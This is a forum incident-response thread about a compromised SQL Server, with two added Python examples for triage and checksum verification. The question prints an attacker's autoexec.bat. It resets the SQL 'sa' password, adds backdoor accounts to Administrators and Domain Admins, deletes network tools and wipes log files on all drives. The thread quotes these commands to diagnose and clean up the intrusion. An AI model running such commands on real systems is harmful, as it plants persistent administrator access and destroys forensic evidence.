Autoexec.bat modified on SQL Server

Posted on 2005-04-12
Last Modified: 2013-12-04
I was notified by my data center that my bandwidth went up 500% on my SQL Server. Upon investigation we found an exe running (info.exe). Rebooting the server stops the file from running, but a search cannot find the file, and it keeps reappearing. The box has real-time virus protection running (and yes, it is up to date); we also run spyware detection. After further investigation we found that the autoexec.bat had been modified as follows:

@ECHO off

osql -E -Q "sp_password NULL,HOLLOWM@N,sa

net user IUSR_ROOT HOLLOWM@N /add
net localgroup Administrators IUSR_ROOT /add
net group "Domain Admins" IUSR_ROOT /add

net user Admin HOLLOWM@N /add
net localgroup Administrators Admin /add
net group "Domain Admins" Admin /add

del c:\ftp.exe /S
del c:\tftp.exe /S
del c:\tftpd.exe /S
del c:\cscript.exe /S
del c:\wscript.exe /S
del c:\telnet.exe /S
del c:\nc.exe /S
del c:\save.bat /S
del c:\rcp.exe /S

del c:\ftp.exe /S
del c:\tftp.exe /S
del c:\tftpd.exe /S
del c:\cscript.exe /S
del c:\wscript.exe /S
del c:\telnet.exe /S
del c:\nc.exe /S
del c:\save.bat /S
del c:\rcp.exe /S

del c:\*.log/s
del d:\*.log/s
del e:\*.log/s
del f:\*.log/s
del g:\*.log/s
del h:\*.log/s
del c:\d.txt
del c:\do.txt
del c:\doc.txt


Any ideas?
Question by:cooperrd
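A triage pass over the posted autoexec.bat, as an added example that is not part of the original question or of either answer: it parses the batch text and pulls out the SQL Server sa password reset, the accounts created, the group memberships granted, the transfer and scripting tools removed, and the drives whose logs were wiped, then turns those into a checklist for the responder. The regexes, the Findings layout and the trimmed copy of the batch file embedded as sample input are this example's own assumptions.

```python
"""Triage of a tampered autoexec.bat: pull out the persistence and
anti-forensic actions so the responder knows exactly what to verify.
Added example; the regexes and the Findings layout are assumptions of
this example, not anything from the original post or the answers."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample input: the tampered autoexec.bat from the question,
# trimmed to the lines that matter for triage.
SAMPLE_AUTOEXEC = r"""@ECHO off
osql -E -Q "sp_password NULL,HOLLOWM@N,sa
net user IUSR_ROOT HOLLOWM@N /add
net localgroup Administrators IUSR_ROOT /add
net group "Domain Admins" IUSR_ROOT /add
net user Admin HOLLOWM@N /add
net localgroup Administrators Admin /add
net group "Domain Admins" Admin /add
del c:\ftp.exe /S
del c:\nc.exe /S
del c:\*.log/s
del d:\*.log/s
del c:\d.txt
"""

# osql -E uses a trusted connection, i.e. the Windows account running the
# batch file; sp_password NULL,<new>,sa sets a new sa password without the old one.
SA_RESET = re.compile(r'osql\b.*\bsp_password\s+NULL\s*,\s*([^,\s"]+)\s*,\s*sa\b', re.I)
USER_ADD = re.compile(r'^net\s+user\s+(\S+)\s+(\S+)\s+/add\b', re.I)
GROUP_ADD = re.compile(r'^net\s+(localgroup|group)\s+(?:"([^"]+)"|(\S+))\s+(\S+)\s+/add\b', re.I)
LOG_WIPE = re.compile(r'^del\s+([a-z]:)\\\*\.log\s*/s\b', re.I)        # del x:\*.log /s
TOOL_DEL = re.compile(r'^del\s+[a-z]:\\([^\s\\]+\.(?:exe|bat))\s+/s\b', re.I)


@dataclass
class Findings:
    sa_password: Optional[str] = None                          # new sa password, if reset
    accounts_created: Dict[str, str] = field(default_factory=dict)   # name -> password
    local_group_adds: List[Tuple[str, str]] = field(default_factory=list)   # (group, account)
    domain_group_adds: List[Tuple[str, str]] = field(default_factory=list)  # (group, account)
    deleted_tools: List[str] = field(default_factory=list)     # ftp/tftp/nc/cscript... removed
    log_wipes: List[str] = field(default_factory=list)         # drives whose *.log were deleted
    other_deletes: List[str] = field(default_factory=list)

    def is_suspicious(self) -> bool:
        return bool(self.sa_password or self.accounts_created
                    or self.local_group_adds or self.domain_group_adds)


def triage(batch_text: str) -> Findings:
    """Classify each line of the batch file; first matching rule wins."""
    f = Findings()
    for raw in batch_text.splitlines():
        line = raw.strip().lstrip("@")          # '@' only suppresses echo
        if not line or line.lower().startswith(("rem ", "::")):
            continue
        if (m := SA_RESET.search(line)):
            f.sa_password = m.group(1)
        elif (m := USER_ADD.match(line)):
            f.accounts_created[m.group(1)] = m.group(2)
        elif (m := GROUP_ADD.match(line)):
            scope, group, account = m.group(1).lower(), m.group(2) or m.group(3), m.group(4)
            target = f.local_group_adds if scope == "localgroup" else f.domain_group_adds
            target.append((group, account))
        elif (m := LOG_WIPE.match(line)):
            f.log_wipes.append(m.group(1).lower())
        elif (m := TOOL_DEL.match(line)):
            f.deleted_tools.append(m.group(1).lower())
        elif line.lower().startswith("del "):
            f.other_deletes.append(line.split(None, 1)[1])
    return f


def checklist(f: Findings) -> List[str]:
    """Turn findings into concrete things to verify on the isolated host."""
    items = []
    if f.sa_password:
        items.append("SQL Server 'sa' password was reset: rotate it and audit sa logins")
    for name in f.accounts_created:
        items.append(f"local account {name}: remove it and look for logons under it")
    for group, acct in f.local_group_adds + f.domain_group_adds:
        items.append(f"membership of {acct} in {group}: remove it")
    if f.deleted_tools:
        items.append("tools deleted (" + ", ".join(f.deleted_tools) + "): restore from media")
    if f.log_wipes:
        items.append("logs wiped on " + ", ".join(f.log_wipes) + ": use off-host copies")
    return items


if __name__ == "__main__":
    findings = triage(SAMPLE_AUTOEXEC)
    print("suspicious:", findings.is_suspicious())
    for item in checklist(findings):
        print(" -", item)
```

Run it against the real file copied off the box from a trusted environment rather than on the live host. Because the sa reset runs through a trusted connection at boot, the two accounts, the Administrators and Domain Admins memberships and the sa password must all be treated as known to the attacker, and the recursive `*.log` deletion on every drive means the on-host logs cannot be relied on; the data center's bandwidth records are the surviving evidence.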

    Assisted Solution


    Looks like a "Rootkit"
    Download and run these (free):
    Rootkit Revealer
    F-Secure BlackLight rootkit revealer

    Good luck!

    Accepted Solution

    If you can't figure out the entry mechanism, you may have no choice but to start from scratch.

    You definitely have a rootkit and it's custom from looking at your modified autoexec.bat.

    Here are some other resources to shed light on what has happened:

    Cleaning Up after a Rootkit attack:
    Once you discover a compromised host, you must determine the extent of the attack. You must presume that all network transactions from or to any host "visible" on the network for the duration of the compromise were monitored and that intruders potentially possess any or all of the information so exposed. You should perform recovery and prevent future attacks as described below.

    Disconnect the host from the network or operate the system in single-user mode during the recovery. This will keep users and intruders from accessing the system.

    Locating Trojan versions of the standard system programs can be difficult, and you should be cautious in doing so. The intruder may have installed other Trojan programs not part of Rootkit, therefore all system utilities should NOT be trusted unless restored from distribution media or a floppy disk as discussed above. This especially refers to cd, dir, mkdir, etc.

    I advise that an entire system install be performed from read-only distribution media. If this is not feasible, all system binaries should be compared using a known good copy of md5 against the read-only distribution media. Since rootkits install Trojan programs with the exact checksum and timestamp as the legitimate version, these attributes cannot be used to find Trojan programs. However, cryptographic checksums are nearly impossible to spoof. Therefore, md5 from the read-only floppy described above can be trusted to compare installed programs against the distribution media or known correct checksums.

    Resist the temptation of restoring from backups, unless it is positively known the backups were made before the Trojans were installed. Otherwise there is too great a chance the backups contain the Trojan programs, rather than the legitimate ones.
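A checksum comparison of the kind the accepted answer describes, as an added example rather than anything from the original thread: it reads a manifest of known-good digests, hashes each listed file and reports ok / modified / missing. The demo builds a small constructed tree in which one file is replaced by a same-size file with its original timestamp restored, so size and mtime look clean and only the digest catches it. The answer says md5; the algorithm is a parameter here, defaulting to SHA-256 since md5 collisions are practical today. The manifest format and the fake directory layout are this example's assumptions.

```python
"""Verify installed binaries against a known-good checksum manifest and
show why size and timestamp are not enough. Added example; the manifest
format (md5sum/sha256sum style '<digest>  <relative path>') and the
fake directory layout are this example's own assumptions."""
import hashlib
import os
import tempfile
from pathlib import Path
from typing import Dict, List


def file_digest(path: Path, algo: str = "sha256", chunk: int = 1 << 20) -> str:
    """Stream the file through the chosen hash; algo='md5' matches the
    answer's md5 manifests, sha256 is the sensible default today."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def parse_manifest(text: str) -> Dict[str, str]:
    """'<hexdigest>  <path>' per line, '#' comments allowed; a '*' binary-mode
    marker before the path (as md5sum -b emits) is stripped."""
    known: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, rel = line.partition("  ")
        known[rel.strip().lstrip("*")] = digest.lower()
    return known


def verify_tree(root: Path, manifest: Dict[str, str], algo: str = "sha256") -> Dict[str, List[str]]:
    """Classify every manifest entry as ok / modified / missing."""
    report: Dict[str, List[str]] = {"ok": [], "modified": [], "missing": []}
    for rel, expected in manifest.items():
        p = Path(root) / rel
        if not p.is_file():
            report["missing"].append(rel)
        elif file_digest(p, algo) != expected:
            report["modified"].append(rel)
        else:
            report["ok"].append(rel)
    return report


def demo():
    """Constructed scenario: three fake binaries with a manifest; one is
    swapped for a same-size file with the original mtime put back (what the
    answer means by a matching timestamp), one is deleted. Returns the report
    plus whether size and mtime of the trojaned file still look untouched."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "system32").mkdir()
        files = {
            "system32/cmd.exe": b"MZ-good-cmd-0001",
            "system32/dir.exe": b"MZ-good-dir-0001",
            "system32/net.exe": b"MZ-good-net-0001",
        }
        for rel, data in files.items():
            (root / rel).write_bytes(data)
        manifest = parse_manifest("\n".join(
            f"{hashlib.sha256(data).hexdigest()}  {rel}" for rel, data in files.items()))

        victim = root / "system32" / "dir.exe"
        before = victim.stat()
        victim.write_bytes(b"MZ-evil-dir-0001")                        # same length as original
        os.utime(victim, ns=(before.st_atime_ns, before.st_mtime_ns))  # restore the mtime
        (root / "system32" / "net.exe").unlink()

        after = victim.stat()
        looks_untouched = (after.st_size == before.st_size
                           and after.st_mtime_ns == before.st_mtime_ns)
        return verify_tree(root, manifest), looks_untouched


if __name__ == "__main__":
    report, looks_untouched = demo()
    print("size/mtime unchanged on trojaned file:", looks_untouched)
    for state, paths in report.items():
        print(f"{state:9s}", ", ".join(paths) or "-")
```

The hasher and the interpreter it runs under must themselves be trusted, which is the point of the answer's read-only media: a kernel-level rootkit on the live host can hand a file reader clean bytes for a trojaned binary, so hash the disk from a clean boot or from another system, and take the manifest from distribution media rather than from the compromised box.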
